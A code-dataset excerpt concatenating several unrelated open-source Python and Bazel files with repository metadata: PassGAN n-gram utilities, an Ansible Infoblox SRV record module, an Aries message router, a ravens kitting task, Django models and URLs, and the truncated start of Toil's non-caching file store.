        name = "com_google_protobuf",
        sha256 = "2ba20d91341ef88259896a5dfaf55666d11648caa0964342991e30a96b7cd630",
        strip_prefix = "protobuf-3.10.0-rc1",
        urls = [
            "https://mirror.bazel.build/github.com/protocolbuffers/protobuf/archive/v3.10.0-rc1.zip",
            "https://github.com/protocolbuffers/protobuf/archive/v3.10.0-rc1.zip",
        ],
        # Map protobuf's @zlib reference onto the workspace's @net_zlib repo.
        repo_mapping = {"@zlib": "@net_zlib"},
    )
    # Generator for LLVM Bazel build files, pinned to a specific commit.
    maybe(
        http_archive,
        name = "io_kythe_llvmbzlgen",
        sha256 = "6d077cfe818d08ea9184d71f73581135b69c379692771afd88392fa1fee018ac",
        urls = [
            "https://mirror.bazel.build/github.com/kythe/llvmbzlgen/archive/435bad1d07f7a8d32979d66cd5547e1b32dca812.zip",
            "https://github.com/kythe/llvmbzlgen/archive/435bad1d07f7a8d32979d66cd5547e1b32dca812.zip",
        ],
        strip_prefix = "llvmbzlgen-435bad1d07f7a8d32979d66cd5547e1b32dca812",
    )
    _bindings()
    _rule_dependencies()
    if sample_ui:
        _sample_ui_dependencies()
    _extractor_image_dependencies()
| 35.901993
| 128
| 0.627562
|
4a15c9ef8bbe1406602bf5d332882026c818850d
| 4,371
|
py
|
Python
|
utils.py
|
rsj123/PassGAN
|
02f18a7b83c0ca8deb76c7c2cfacc5aeb99e7999
|
[
"MIT"
] | 1
|
2021-03-22T07:58:15.000Z
|
2021-03-22T07:58:15.000Z
|
utils.py
|
rsj123/PassGAN
|
02f18a7b83c0ca8deb76c7c2cfacc5aeb99e7999
|
[
"MIT"
] | 1
|
2020-03-10T00:09:12.000Z
|
2020-03-10T00:09:12.000Z
|
utils.py
|
rsj123/PassGAN
|
02f18a7b83c0ca8deb76c7c2cfacc5aeb99e7999
|
[
"MIT"
] | 1
|
2020-03-09T08:07:41.000Z
|
2020-03-09T08:07:41.000Z
|
import collections
import numpy as np
import re
def tokenize_string(sample):
    """Lower-case *sample* and split it on single spaces into a tuple of tokens."""
    lowered = sample.lower()
    return tuple(lowered.split(' '))
class NgramLanguageModel(object):
    """Empirical n-gram language model built from a list of samples.

    Each sample is a sequence (tuple of characters or word tokens); the model
    counts every contiguous length-n subsequence and exposes maximum-likelihood
    log-probabilities plus several divergence/similarity metrics against
    another NgramLanguageModel.
    """
    def __init__(self, n, samples, tokenize=False):
        # n: n-gram order.  samples: iterable of sequences, or of raw strings
        # when tokenize=True (then lower-cased and split on single spaces).
        if tokenize:
            tokenized_samples = []
            for sample in samples:
                tokenized_samples.append(tokenize_string(sample))
            samples = tokenized_samples
        self._n = n
        self._samples = samples
        # Raw n-gram frequency table and total count (the ML denominator).
        self._ngram_counts = collections.defaultdict(int)
        self._total_ngrams = 0
        for ngram in self.ngrams():
            self._ngram_counts[ngram] += 1
            self._total_ngrams += 1
    def ngrams(self):
        """Yield every overlapping n-gram of every sample, with repetition."""
        n = self._n
        for sample in self._samples:
            for i in range(len(sample)-n+1):
                yield sample[i:i+n]
    def unique_ngrams(self):
        """Return the set of distinct n-grams observed in the samples."""
        return set(self._ngram_counts.keys())
    def log_likelihood(self, ngram):
        """Return the maximum-likelihood log-probability of ``ngram``.

        Returns -inf for n-grams never observed in the samples.
        """
        if ngram not in self._ngram_counts:
            return -np.inf
        else:
            return np.log(self._ngram_counts[ngram]) - np.log(self._total_ngrams)
    def kl_to(self, p):
        """Estimate KL(p || self) by averaging log-ratios over p's n-grams.

        Iterating p.ngrams() (with repetition) weights each log-ratio by p's
        empirical frequency.  The result is +inf/nan whenever self lacks an
        n-gram that p contains, since self.log_likelihood is then -inf.
        """
        # p is another NgramLanguageModel
        log_likelihood_ratios = []
        for ngram in p.ngrams():
            log_likelihood_ratios.append(p.log_likelihood(ngram) - self.log_likelihood(ngram))
        return np.mean(log_likelihood_ratios)
    def cosine_sim_with(self, p):
        """Cosine similarity between the two models' probability vectors."""
        # p is another NgramLanguageModel
        p_dot_q = 0.
        p_norm = 0.
        q_norm = 0.
        # The dot product only needs n-grams present in p (others contribute 0).
        for ngram in p.unique_ngrams():
            p_i = np.exp(p.log_likelihood(ngram))
            q_i = np.exp(self.log_likelihood(ngram))
            p_dot_q += p_i * q_i
            p_norm += p_i**2
        for ngram in self.unique_ngrams():
            q_i = np.exp(self.log_likelihood(ngram))
            q_norm += q_i**2
        return p_dot_q / (np.sqrt(p_norm) * np.sqrt(q_norm))
    def precision_wrt(self, p):
        """Fraction of self's n-gram mass whose n-grams also appear in p.

        NOTE(review): raises ZeroDivisionError when self contains no n-grams.
        """
        # p is another NgramLanguageModel
        num = 0.
        denom = 0
        p_ngrams = p.unique_ngrams()
        for ngram in self.unique_ngrams():
            if ngram in p_ngrams:
                num += self._ngram_counts[ngram]
            denom += self._ngram_counts[ngram]
        return float(num) / denom
    def recall_wrt(self, p):
        """Recall of self w.r.t. p, i.e. p's precision w.r.t. self."""
        return p.precision_wrt(self)
    def js_with(self, p):
        """Jensen-Shannon divergence between self and p, normalized by log 2."""
        # KL(p || m) over p's support, where m is the even mixture of p and q.
        log_p = np.array([p.log_likelihood(ngram) for ngram in p.unique_ngrams()])
        log_q = np.array([self.log_likelihood(ngram) for ngram in p.unique_ngrams()])
        log_m = np.logaddexp(log_p - np.log(2), log_q - np.log(2))
        kl_p_m = np.sum(np.exp(log_p) * (log_p - log_m))
        # KL(q || m) over self's support.
        log_p = np.array([p.log_likelihood(ngram) for ngram in self.unique_ngrams()])
        log_q = np.array([self.log_likelihood(ngram) for ngram in self.unique_ngrams()])
        log_m = np.logaddexp(log_p - np.log(2), log_q - np.log(2))
        kl_q_m = np.sum(np.exp(log_q) * (log_q - log_m))
        return 0.5*(kl_p_m + kl_q_m) / np.log(2)
def load_dataset(path, max_length, tokenize=False, max_vocab_size=2048):
    """Load a newline-delimited dataset and map rare symbols to 'unk'.

    Args:
        path: Path to a text file with one sample per line.
        max_length: Samples longer than this are skipped entirely; shorter
            ones are right-padded with the '`' character to this length.
        tokenize: If True, lower-case each line and split it into word tokens;
            otherwise treat each line as a sequence of characters.
        max_vocab_size: Keep at most this many symbols (including 'unk');
            anything rarer is replaced by 'unk'.

    Returns:
        A tuple (filtered_lines, charmap, inv_charmap): a shuffled list of
        equal-length symbol tuples, a symbol -> id mapping, and its inverse
        list (id -> symbol).
    """
    lines = []
    with open(path, 'r') as f:
        for line in f:
            line = line[:-1]  # drop the trailing newline character
            if tokenize:
                line = tokenize_string(line)
            else:
                line = tuple(line)
            if len(line) > max_length:
                # Bug fix: the original assigned `line = line[:max_length]`
                # here and then immediately `continue`d, so the truncation was
                # dead code.  The effective behavior (skip over-long samples)
                # is preserved.
                continue
            # Right-pad with '`' so every sample has exactly max_length symbols.
            lines.append(line + (('`',) * (max_length - len(line))))
    np.random.shuffle(lines)
    counts = collections.Counter(char for line in lines for char in line)
    # Index 0 is reserved for the out-of-vocabulary symbol.
    charmap = {'unk': 0}
    inv_charmap = ['unk']
    for char, count in counts.most_common(max_vocab_size - 1):
        if char not in charmap:
            charmap[char] = len(inv_charmap)
            inv_charmap.append(char)
    # Replace out-of-vocabulary symbols with 'unk'.
    filtered_lines = []
    for line in lines:
        filtered_line = [char if char in charmap else 'unk' for char in line]
        filtered_lines.append(tuple(filtered_line))
    print("loaded {} lines in dataset".format(len(lines)))
    return filtered_lines, charmap, inv_charmap
| 32.377778
| 94
| 0.586365
|
4a15caf21f502e3d03a090722faaab48b2c92faf
| 4,604
|
py
|
Python
|
Collections-a-installer/community-general-2.4.0/plugins/modules/nios_srv_record.py
|
d-amien-b/simple-getwordpress
|
da90d515a0aa837b633d50db4d91d22b031c04a2
|
[
"MIT"
] | 5
|
2020-12-16T21:42:09.000Z
|
2022-03-28T16:04:32.000Z
|
Collections-a-installer/community-general-2.4.0/plugins/modules/nios_srv_record.py
|
d-amien-b/simple-getwordpress
|
da90d515a0aa837b633d50db4d91d22b031c04a2
|
[
"MIT"
] | null | null | null |
Collections-a-installer/community-general-2.4.0/plugins/modules/nios_srv_record.py
|
d-amien-b/simple-getwordpress
|
da90d515a0aa837b633d50db4d91d22b031c04a2
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# Copyright (c) 2018 Red Hat, Inc.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = '''
---
module: nios_srv_record
author: "Blair Rampling (@brampling)"
short_description: Configure Infoblox NIOS SRV records
description:
- Adds and/or removes instances of SRV record objects from
Infoblox NIOS servers. This module manages NIOS C(record:srv) objects
using the Infoblox WAPI interface over REST.
requirements:
- infoblox-client
extends_documentation_fragment:
- community.general.nios
options:
name:
description:
- Specifies the fully qualified hostname to add or remove from
the system
required: true
view:
description:
- Sets the DNS view to associate this SRV record with. The DNS
view must already be configured on the system
default: default
aliases:
- dns_view
port:
description:
- Configures the port (0-65535) of this SRV record.
priority:
description:
- Configures the priority (0-65535) for this SRV record.
target:
description:
- Configures the target FQDN for this SRV record.
weight:
description:
- Configures the weight (0-65535) for this SRV record.
ttl:
description:
- Configures the TTL to be associated with this host record
extattrs:
description:
- Allows for the configuration of Extensible Attributes on the
instance of the object. This argument accepts a set of key / value
pairs for configuration.
comment:
description:
- Configures a text string comment to be associated with the instance
of this object. The provided text string will be configured on the
object instance.
state:
description:
- Configures the intended state of the instance of the object on
the NIOS server. When this value is set to C(present), the object
is configured on the device and when this value is set to C(absent)
the value is removed (if necessary) from the device.
default: present
choices:
- present
- absent
'''
EXAMPLES = '''
- name: Configure an SRV record
community.general.nios_srv_record:
name: _sip._tcp.service.ansible.com
port: 5080
priority: 10
target: service1.ansible.com
weight: 10
state: present
provider:
host: "{{ inventory_hostname_short }}"
username: admin
password: admin
connection: local
- name: Add a comment to an existing SRV record
community.general.nios_srv_record:
name: _sip._tcp.service.ansible.com
port: 5080
priority: 10
target: service1.ansible.com
weight: 10
comment: this is a test comment
state: present
provider:
host: "{{ inventory_hostname_short }}"
username: admin
password: admin
connection: local
- name: Remove an SRV record from the system
community.general.nios_srv_record:
name: _sip._tcp.service.ansible.com
port: 5080
priority: 10
target: service1.ansible.com
weight: 10
state: absent
provider:
host: "{{ inventory_hostname_short }}"
username: admin
password: admin
connection: local
'''
RETURN = ''' # '''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.six import iteritems
from ansible_collections.community.general.plugins.module_utils.net_tools.nios.api import WapiModule
from ansible_collections.community.general.plugins.module_utils.net_tools.nios.api import NIOS_SRV_RECORD
def main():
    """Entry point: build the argument spec and run the NIOS WAPI module."""
    # Fields of the WAPI record:srv object; ib_req marks fields Infoblox
    # requires to identify/create the record.
    ib_spec = {
        'name': {'required': True, 'ib_req': True},
        'view': {'default': 'default', 'aliases': ['dns_view'], 'ib_req': True},
        'port': {'type': 'int', 'ib_req': True},
        'priority': {'type': 'int', 'ib_req': True},
        'target': {'ib_req': True},
        'weight': {'type': 'int', 'ib_req': True},
        'ttl': {'type': 'int'},
        'extattrs': {'type': 'dict'},
        'comment': {},
    }
    # Ansible-level arguments layered on top of the object spec.
    argument_spec = {
        'provider': {'required': True},
        'state': {'default': 'present', 'choices': ['present', 'absent']},
    }
    argument_spec.update(ib_spec)
    argument_spec.update(WapiModule.provider_spec)
    module = AnsibleModule(
        argument_spec=argument_spec,
        supports_check_mode=True,
    )
    result = WapiModule(module).run(NIOS_SRV_RECORD, ib_spec)
    module.exit_json(**result)
if __name__ == '__main__':
main()
| 28.245399
| 105
| 0.685056
|
4a15cc06745d0808d634d30f811ea58cc8004552
| 7,993
|
py
|
Python
|
aries_staticagent/module.py
|
hyperledger/aries-staticagent-python
|
6aa317a5330d64f610ee9cccb3d02211659b8a64
|
[
"Apache-2.0"
] | 18
|
2019-06-20T18:19:36.000Z
|
2022-01-17T04:30:18.000Z
|
aries_staticagent/module.py
|
hyperledger/aries-staticagent-python
|
6aa317a5330d64f610ee9cccb3d02211659b8a64
|
[
"Apache-2.0"
] | 16
|
2019-06-20T18:24:49.000Z
|
2021-05-19T17:38:40.000Z
|
aries_staticagent/module.py
|
hyperledger/aries-staticagent-python
|
6aa317a5330d64f610ee9cccb3d02211659b8a64
|
[
"Apache-2.0"
] | 20
|
2019-06-20T16:54:13.000Z
|
2021-12-03T00:08:37.000Z
|
""" Module base class """
from abc import ABC
from functools import partial
from typing import (
Callable,
ClassVar,
Dict,
Iterable,
Mapping,
TypeVar,
Union,
overload,
)
from .message import MsgType, ProtocolIdentifier
RouteFunc = TypeVar("RouteFunc", bound=Callable)
class ModuleRouter(Mapping[MsgType, Callable]):
    """Collect module routes.

    Behaves as a read-only mapping from message type to handler.  Routes are
    registered through the ``route`` decorator (or by calling the router
    instance directly).
    """

    def __init__(
        self,
        protocol: Union[str, ProtocolIdentifier],
    ):
        # Accept either a raw protocol string ("doc/protocol/1.0") or an
        # already-parsed identifier.
        if not isinstance(protocol, ProtocolIdentifier):
            protocol = ProtocolIdentifier(protocol)
        self.protocol = protocol
        self._routes: Dict[Union[str, MsgType], Callable] = {}

    def __getitem__(self, item: Union[str, MsgType]) -> Callable:
        return self._routes[item]

    def __iter__(self) -> Iterable:
        return iter(self._routes)

    def __len__(self):
        return len(self._routes)

    def _route(
        self,
        func: RouteFunc,
        *,
        doc_uri: str = None,
        protocol: str = None,
        version: str = None,
        name: str = None,
        msg_type: Union[str, MsgType] = None
    ) -> RouteFunc:
        """Collect route."""
        # An explicit msg_type overrides everything else; otherwise compose
        # the type from this router's protocol, with each component
        # individually overridable (falling back to the function's name).
        if msg_type:
            if isinstance(msg_type, str):
                msg_type = MsgType(msg_type)
            type_to_route = msg_type
        else:
            type_to_route = MsgType.unparse(
                doc_uri=doc_uri or self.protocol.doc_uri or "",
                protocol=protocol or self.protocol.protocol or "",
                version=version or self.protocol.version or "",
                name=name or func.__name__ or "",
            )
        self._routes[type_to_route] = func
        return func

    @overload
    def route(
        self,
        func_or_name: RouteFunc,
    ) -> RouteFunc:
        """Decorator for defining routes within a module.

        >>> router = ModuleRouter("doc/protocol/1.0")
        >>> @router
        ... def test():
        ...     pass
        >>> assert "doc/protocol/1.0/test" in router
        >>> assert router["doc/protocol/1.0/test"] == test
        """
        ...

    @overload
    def route(
        self,
        func_or_name: str,
    ) -> Callable[..., RouteFunc]:
        """Decorator for defining routes within a module.

        >>> router = ModuleRouter("doc/protocol/1.0")
        >>> @router("alt-name")
        ... def test1():
        ...     pass
        >>> assert "doc/protocol/1.0/alt-name" in router
        >>> assert router["doc/protocol/1.0/alt-name"] == test1
        """
        ...

    @overload
    def route(
        self,
        *,
        doc_uri: str = None,
        protocol: str = None,
        version: str = None,
        name: str = None,
        msg_type: Union[str, MsgType] = None
    ) -> Callable[..., RouteFunc]:
        """Decorator for defining routes within a module.

        >>> router = ModuleRouter("doc/protocol/1.0")
        >>> @router(msg_type="another-doc/some-protocol/2.0/name")
        ... def test2():
        ...     pass
        >>> assert "another-doc/some-protocol/2.0/name" in router
        >>> assert router["another-doc/some-protocol/2.0/name"] == test2
        >>>
        >>> @router(doc_uri="another-doc/")
        ... def test3():
        ...     pass
        >>> assert "another-doc/protocol/1.0/test3" in router
        >>> assert router["another-doc/protocol/1.0/test3"] == test3
        >>> @router(protocol="some-protocol")
        ... def test4():
        ...     pass
        >>> assert "doc/some-protocol/1.0/test4" in router
        >>> assert router["doc/some-protocol/1.0/test4"] == test4
        >>>
        >>> @router(version="2.0")
        ... def test5():
        ...     pass
        >>> assert "doc/protocol/2.0/test5" in router
        >>> assert router["doc/protocol/2.0/test5"] == test5
        >>>
        >>> @router(name="another-alt-name")
        ... def test6():
        ...     pass
        >>> assert "doc/protocol/1.0/another-alt-name" in router
        >>> assert router["doc/protocol/1.0/another-alt-name"] == test6
        """
        ...

    @overload
    def route(
        self,
        func_or_name: RouteFunc,
        *,
        doc_uri: str = None,
        protocol: str = None,
        version: str = None,
        name: str = None,
        msg_type: Union[str, MsgType] = None
    ) -> RouteFunc:
        """Decorator for defining routes within a module."""
        ...

    def route(
        self,
        func_or_name: Union[RouteFunc, str] = None,
        *,
        doc_uri: str = None,
        protocol: str = None,
        version: str = None,
        name: str = None,
        msg_type: Union[str, MsgType] = None
    ) -> Union[Callable[..., RouteFunc], RouteFunc]:
        """Decorator for defining routes within a module."""
        # Empty @route() case
        if not func_or_name:
            return lambda f: self.route(
                f,
                doc_uri=doc_uri,
                protocol=protocol,
                version=version,
                name=name,
                msg_type=msg_type,
            )
        # @route("msg_name") case
        if isinstance(func_or_name, str):
            name = func_or_name
            return lambda f: self.route(
                f,
                doc_uri=doc_uri,
                protocol=protocol,
                version=version,
                name=name,
                msg_type=msg_type,
            )
        # After the previous checks, the first positional argument must now be
        # the method to decorate.
        if not callable(func_or_name):
            raise TypeError("func is not a callable")
        return self._route(
            func_or_name,
            doc_uri=doc_uri,
            protocol=protocol,
            version=version,
            name=name,
            msg_type=msg_type,
        )

    def __call__(self, *args, **kwargs):
        # Allow the router instance itself to be used as the decorator.
        return self.route(*args, **kwargs)

    def contextualize(self, context: object) -> Dict[MsgType, Callable]:
        """Return routes with handlers wrapped as partials to include 'self'."""
        return {
            msg_type: partial(handler, context) for msg_type, handler in self.items()
        }
class Module(ABC):  # pylint: disable=too-few-public-methods
    """Base class for protocol modules.

    Subclasses provide a ``protocol`` identifier string and a ``route``
    ModuleRouter; instances expose the parsed identifier pieces and the
    routes bound to the instance.
    """

    protocol: ClassVar[str]
    route: ClassVar[ModuleRouter]

    def __init__(self):
        # Parse the class-level protocol string once; routes are built lazily.
        self._protocol_identifier = ProtocolIdentifier(self.protocol)
        self._routes = None

    @property
    def protocol_identifier(self) -> ProtocolIdentifier:
        """Parsed protocol identifier."""
        return self._protocol_identifier

    @property
    def router(self) -> ModuleRouter:
        """Alias to route."""
        return self.route

    @property
    def doc_uri(self) -> str:
        """Doc URI component of the protocol identifier."""
        return self.protocol_identifier.doc_uri

    @property
    def protocol_name(self) -> str:
        """Protocol name component of the protocol identifier."""
        return self.protocol_identifier.protocol

    @property
    def version(self) -> str:
        """Version component of the protocol identifier."""
        return self.protocol_identifier.version

    def type(
        self, name: str, doc_uri: str = None, protocol: str = None, version: str = None
    ):
        """Build a message type string for this module.

        Components left unset fall back to this module's protocol.  doc_uri
        uses an explicit None check because the empty string is a legitimate
        value for it.
        """
        if doc_uri is None:
            doc_uri = self.doc_uri
        if not protocol:
            protocol = self.protocol_name
        if not version:
            version = self.version
        return MsgType.unparse(doc_uri, protocol, version, name)

    def _contextualize_routes(self) -> Mapping[MsgType, Callable]:
        # Bind each handler's first argument to this instance.
        return self.router.contextualize(context=self)

    @property
    def routes(self) -> Mapping[MsgType, Callable]:
        """Routes for this module, bound to this instance and cached."""
        if self._routes is None:
            self._routes = self._contextualize_routes()
        return self._routes
| 29.171533
| 87
| 0.552734
|
4a15cc1173dd59a379151eb3aa0b1ce47089da1f
| 4,604
|
py
|
Python
|
ravens/tasks/assembling_kits.py
|
OolongQian/ravens
|
5774494de040ab0e8b3a0a93772f55916fbf0e53
|
[
"Apache-2.0"
] | 1
|
2021-09-15T16:27:05.000Z
|
2021-09-15T16:27:05.000Z
|
ravens/tasks/assembling_kits.py
|
roboticslab-uc3m/ravens
|
1e68b1c53610ea5370e0f5fc8c31182842090726
|
[
"Apache-2.0"
] | null | null | null |
ravens/tasks/assembling_kits.py
|
roboticslab-uc3m/ravens
|
1e68b1c53610ea5370e0f5fc8c31182842090726
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# Copyright 2021 The Ravens Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Kitting Tasks."""
import os
import numpy as np
from ravens.tasks.task import Task
from ravens.utils import utils
class AssemblingKits(Task):
  """Kitting task: place randomly shaped objects into matching kit cutouts.

  Each episode spawns a fixed kit board with five dark target silhouettes and
  five movable colored objects whose shapes are drawn from a train or test
  pool.  The goal is to place every object on a target slot of the same shape
  (up to each shape's rotational symmetry).
  """

  def __init__(self):
    super().__init__()
    self.max_steps = 10
    # Shape ids 0-13 are used for training episodes, 14-19 for testing.
    self.train_set = np.arange(0, 14)
    self.test_set = np.arange(14, 20)
    # When True, every object in a test episode uses one single shape.
    self.homogeneous = False

  def reset(self, env):
    """Build a fresh episode: kit board, target poses, objects, and the goal."""
    super().reset(env)

    # Add kit.
    kit_size = (0.28, 0.2, 0.005)
    kit_urdf = 'kitting/kit.urdf'
    kit_pose = self.get_random_pose(env, kit_size)
    env.add_object(kit_urdf, kit_pose, 'fixed')

    # Sample the object shapes for this episode.
    n_objects = 5
    if self.mode == 'train':
      obj_shapes = np.random.choice(self.train_set, n_objects)
    else:
      if self.homogeneous:
        obj_shapes = [np.random.choice(self.test_set)] * n_objects
      else:
        obj_shapes = np.random.choice(self.test_set, n_objects)

    colors = [
        utils.COLORS['purple'], utils.COLORS['blue'], utils.COLORS['green'],
        utils.COLORS['yellow'], utils.COLORS['red']
    ]

    # Rotational symmetry (radians) for each of the 20 kit shapes, indexed by
    # shape id; consumed by pose-match scoring.
    symmetry = [
        2 * np.pi, 2 * np.pi, 2 * np.pi / 3, np.pi / 2, np.pi / 2, 2 * np.pi,
        np.pi, 2 * np.pi / 5, np.pi, np.pi / 2, 2 * np.pi / 5, 0, 2 * np.pi,
        2 * np.pi, 2 * np.pi, 2 * np.pi, 0, 2 * np.pi / 6, 2 * np.pi, 2 * np.pi
    ]

    # Build kit: add a fixed dark silhouette for each target slot.
    targets = []
    targ_pos = [[-0.09, 0.045, 0.0014], [0, 0.045, 0.0014],
                [0.09, 0.045, 0.0014], [-0.045, -0.045, 0.0014],
                [0.045, -0.045, 0.0014]]
    template = 'kitting/object-template.urdf'
    for i in range(n_objects):
      shape = os.path.join(self.assets_root, 'kitting',
                           f'{obj_shapes[i]:02d}.obj')
      scale = [0.003, 0.003, 0.0001]  # .0005
      pos = utils.apply(kit_pose, targ_pos[i])
      theta = np.random.rand() * 2 * np.pi
      rot = utils.eulerXYZ_to_quatXYZW((0, 0, theta))
      replace = {'FNAME': (shape,), 'SCALE': scale, 'COLOR': (0.2, 0.2, 0.2)}
      urdf = self.fill_template(template, replace)
      env.add_object(urdf, (pos, rot), 'fixed')
      os.remove(urdf)
      targets.append((pos, rot))

    # Add the movable objects at random poses.
    objects = []
    matches = []
    for i in range(n_objects):
      shape = obj_shapes[i]
      size = (0.08, 0.08, 0.02)
      pose = self.get_random_pose(env, size)
      fname = f'{shape:02d}.obj'
      fname = os.path.join(self.assets_root, 'kitting', fname)
      scale = [0.003, 0.003, 0.001]  # .0005
      replace = {'FNAME': (fname,), 'SCALE': scale, 'COLOR': colors[i]}
      urdf = self.fill_template(template, replace)
      block_id = env.add_object(urdf, pose)
      os.remove(urdf)
      objects.append((block_id, (symmetry[shape], None)))
      # An object may be placed on any target slot that shares its shape.
      match = np.zeros(len(targets))
      match[np.argwhere(obj_shapes == shape).reshape(-1)] = 1
      matches.append(match)
    matches = np.int32(matches)

    # Goal: objects are placed in their respective kit locations.
    self.goals.append((objects, matches, targets, False, True, 'pose', None, 1))
class AssemblingKitsEasy(AssemblingKits):
  """Kitting Task - Easy variant.

  Relaxes the rotation tolerance to 30 degrees, enlarges the train set to all
  shapes except ids 3 and 11 (which become the test set), and makes test
  episodes homogeneous (one shape per episode).
  """

  def __init__(self):
    super().__init__()
    self.rot_eps = np.deg2rad(30)
    # Shapes 3 and 11 are held out for testing; every other shape trains.
    self.train_set = np.int32(
        [0, 1, 2, 4, 5, 6, 7, 8, 9, 10, 12, 13, 14, 15, 16, 17, 18, 19])
    self.test_set = np.int32([3, 11])
    self.homogeneous = True
| 33.122302
| 80
| 0.604692
|
4a15cc70456ad55394b0c86cbde3c38e8b5b7096
| 1,106
|
py
|
Python
|
project/api/models/tag.py
|
hlystovea/BBBS
|
7164ef67615e45d750e965bf958af229b56d49e3
|
[
"BSD-3-Clause"
] | null | null | null |
project/api/models/tag.py
|
hlystovea/BBBS
|
7164ef67615e45d750e965bf958af229b56d49e3
|
[
"BSD-3-Clause"
] | 2
|
2021-06-07T14:06:05.000Z
|
2021-06-18T16:27:29.000Z
|
project/api/models/tag.py
|
hlystovea/BBBS
|
7164ef67615e45d750e965bf958af229b56d49e3
|
[
"BSD-3-Clause"
] | 2
|
2021-07-27T20:40:18.000Z
|
2021-09-12T16:48:19.000Z
|
from django.db import models
from django.utils.translation import gettext_lazy as _
class Tag(models.Model):
    """A content tag belonging to one of the site's fixed sections."""
    # Human-readable tag name shown in the UI.
    name = models.CharField(
        verbose_name=_('Название'),
        max_length=50,
    )
    # Site section the tag belongs to; values are stored in Russian and the
    # choice set is closed (see the tuples below).
    category = models.CharField(
        verbose_name=_('Категория'),
        max_length=50,
        choices=(
            ('Фильмы', _('Фильмы')),
            ('Куда пойти', _('Куда пойти')),
            ('Вопросы', _('Вопросы')),
            ('Права', _('Права')),
            ('Видеоролики', _('Видеоролики')),
            ('Календарь', _('Календарь')),
        ),
    )
    # URL-safe identifier; globally unique across all categories.
    slug = models.SlugField(
        verbose_name=_('Слаг (Ссылка)'),
        unique=True,
    )
    # Manual display ordering within a category (smaller first).
    order = models.PositiveSmallIntegerField(
        verbose_name=_('Порядок вывода'),
        default=0,
        help_text=_(
            'Теги с меньшим значением выводятся первыми.'
        ),
    )
    class Meta:
        app_label = 'api'
        # Sort by section first, then by the manual order field.
        ordering = ('category', 'order')
        verbose_name = _('Тег')
        verbose_name_plural = _('Теги')
    def __str__(self):
        return f'{self.category}: {self.name}'
| 26.333333
| 57
| 0.540687
|
4a15cc8598f69ca28f909a899fc26ef2fbb5d18a
| 688
|
py
|
Python
|
templates/django/{project.name}/urls.py
|
BryanRiel/pyre
|
179359634a7091979cced427b6133dd0ec4726ea
|
[
"BSD-3-Clause"
] | 3
|
2019-08-02T21:02:47.000Z
|
2021-09-08T13:59:43.000Z
|
templates/django/{project.name}/urls.py
|
BryanRiel/pyre
|
179359634a7091979cced427b6133dd0ec4726ea
|
[
"BSD-3-Clause"
] | 1
|
2021-06-10T23:42:13.000Z
|
2021-06-10T23:42:13.000Z
|
templates/django/{project.name}/urls.py
|
BryanRiel/pyre
|
179359634a7091979cced427b6133dd0ec4726ea
|
[
"BSD-3-Clause"
] | 2
|
2020-08-31T18:07:52.000Z
|
2021-12-10T08:54:39.000Z
|
# -*- Python -*-
# -*- coding: utf-8 -*-
#
# {project.authors}
# {project.affiliations}
# (c) {project.span} all rights reserved
#

# this file describes the primary url router for {project.name}

# django imports
# NOTE(review): django.conf.urls.patterns was removed in Django 1.10, so this
# template presumably targets Django <= 1.9 — confirm the intended version.
from django.conf.urls import patterns, include, url
from django.contrib import admin
from django.conf.urls.static import static
from django.conf import settings

# import the {project.name} applications
from . import base

# define the primary url patterns
urlpatterns = patterns('',
    # the administrative interface
    url(r'^admin/', include(admin.site.urls)),
    # everything else is delegated to the base application's url map
    url(r'', include(base.urls)),
    # add the static urls
) + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)

# end of file
| 24.571429
| 67
| 0.72093
|
4a15ccf09834ff7e41d165c5c2cee0f34deb48f9
| 11,773
|
py
|
Python
|
src/toil/fileStores/nonCachingFileStore.py
|
altairwei/toil
|
a11ae486971a51618da9abbc6cb46ef1e9f17874
|
[
"Apache-2.0"
] | null | null | null |
src/toil/fileStores/nonCachingFileStore.py
|
altairwei/toil
|
a11ae486971a51618da9abbc6cb46ef1e9f17874
|
[
"Apache-2.0"
] | null | null | null |
src/toil/fileStores/nonCachingFileStore.py
|
altairwei/toil
|
a11ae486971a51618da9abbc6cb46ef1e9f17874
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (C) 2015-2018 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, print_function
from future import standard_library
standard_library.install_aliases()
from builtins import map
from builtins import str
from collections import defaultdict
from contextlib import contextmanager
import dill
import errno
import fcntl
import logging
import os
import sys
import uuid
from toil.lib.misc import robust_rmtree
from toil.lib.threading import get_process_name, process_name_exists
from toil.lib.humanize import bytes2human
from toil.common import getDirSizeRecursively, getFileSystemSize
from toil.lib.bioio import makePublicDir
from toil.fileStores.abstractFileStore import AbstractFileStore
from toil.fileStores import FileID
logger = logging.getLogger(__name__)
if sys.version_info[0] < 3:
# Define a usable FileNotFoundError as will be raised by os.oprn on a
# nonexistent parent directory.
FileNotFoundError = OSError
class NonCachingFileStore(AbstractFileStore):
def __init__(self, jobStore, jobGraph, localTempDir, waitForPreviousCommit):
super(NonCachingFileStore, self).__init__(jobStore, jobGraph, localTempDir, waitForPreviousCommit)
# This will be defined in the `open` method.
self.jobStateFile = None
self.localFileMap = defaultdict(list)
@contextmanager
def open(self, job):
jobReqs = job.disk
startingDir = os.getcwd()
self.localTempDir = makePublicDir(os.path.join(self.localTempDir, str(uuid.uuid4())))
self._removeDeadJobs(self.workDir)
self.jobStateFile = self._createJobStateFile()
freeSpace, diskSize = getFileSystemSize(self.localTempDir)
if freeSpace <= 0.1 * diskSize:
logger.warning('Starting job %s with less than 10%% of disk space remaining.',
